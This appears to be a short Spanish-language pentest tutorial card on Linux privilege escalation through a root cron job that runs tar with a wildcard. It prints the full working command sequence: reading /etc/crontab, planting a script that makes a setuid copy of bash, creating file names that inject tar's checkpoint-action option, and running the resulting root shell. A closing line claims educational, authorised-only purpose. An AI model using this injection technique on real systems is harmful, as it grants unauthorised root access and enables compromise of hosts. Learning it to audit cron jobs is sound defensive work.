KALI
Privesc con cron y wildcard
Una tarea programada que corre como root es una mina de escalada.
Primero revisa el crontab del sistema buscando scripts que se ejecuten como root y que tú puedas modificar. Y ojo con el truco del wildcard: si un cron usa tar o chown con un asterisco sobre una carpeta donde tú escribes, puedes crear archivos con nombres especiales que se convierten en opciones del comando, y ejecutar lo que quieras como root.
Revisa cada cron con lupa.
# los comandos
www-data@victim:$ cat /etc/crontabcopiar* * * * * root cd /opt/backups && tar czf /tmp/b.tgz *
www-data@victim:$ cd /opt/backups && echo 'cp /bin/bash /tmp/r; chmod +s /tmp/r' > x.shcopiarwww-data@victim:$ touch './--checkpoint=1' './--checkpoint-action=exec=sh x.sh'copiarwww-data@victim:$ /tmp/r -pcopiarr-5.1# id -> euid=0(root)
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.